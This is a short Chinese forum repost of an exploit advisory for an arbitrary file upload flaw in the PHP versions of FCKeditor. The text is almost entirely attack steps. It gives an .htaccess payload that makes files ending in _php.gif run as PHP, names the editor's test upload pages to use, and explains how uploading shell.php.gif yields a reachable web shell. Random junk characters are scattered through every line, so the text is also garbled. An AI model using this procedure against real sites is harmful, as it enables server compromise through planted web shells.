FCKeditor所有php版本Upload上传漏洞
' G5 X3 E7 x$ g4 F作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
8 S' X0 ^/ F& D# A; X Q减小字体 增大字体' P" L" K: c% i6 I4 d
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability; X4 X& J& a! j) g" T; b; M' K
[+] Date: 2011
' ]- y2 J" `) k, _[+] Author : sinesafe.cn
# X/ \; `3 m; e$ G( G& P4 L[+] Website : WwW.sinesafe.cn# `6 F& s0 P, w0 I4 Q
———————————————————
4 a2 X' L2 b7 a' w( c9 R. d6 A1.create a htaccess file:; S% }$ |: J- y& M
code:
6 J. {5 D( G' \' I& ^; @<FilesMatch “_php.gif”>3 w8 c% [4 Q) O% w% z2 ^& M
SetHandler application/x-httpd-php
# [! v# @: Q4 Y9 p y8 L }* R</FilesMatch>( x) X9 B+ e& y# [0 C
; c% V+ _2 p H+ U2 W! g6 X2.Now upload this htaccess with FCKeditor.
1 e) _, J, N% g1 m9 s
1 I" {1 ?( i/ p; H' a- G7 Nhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html, p3 \0 A8 n% O3 R" U/ q& D
1 {! h5 u' X: {5 s
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
4 m+ S( J: z. y" G
9 i% m/ i. B9 D6 J$ b T- h3 r% @———————————————————————————————-
- |+ i: K5 t' i* A5 [9 T7 U0 Q3.Now upload shell.php.gif with FCKeditor.. ]: |% ]! d; ]! m2 L, ] d
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.! Q- @* M. Z, i( N- B+ L
5.http://www.sinesafe.cn/anything/shell_php.gif
( w) F% {, t) }0 a: d2 e: e1 b6.Now shell is available from server. |
! d, p7 _2 j& c/ v0 R0 G
. _& f8 i( x- B9 ~# P5 |( G' @* E" N) z+ T$ s3 Z
|
发表于 2013-10-27 17:25:21
收藏
分享
支持
反对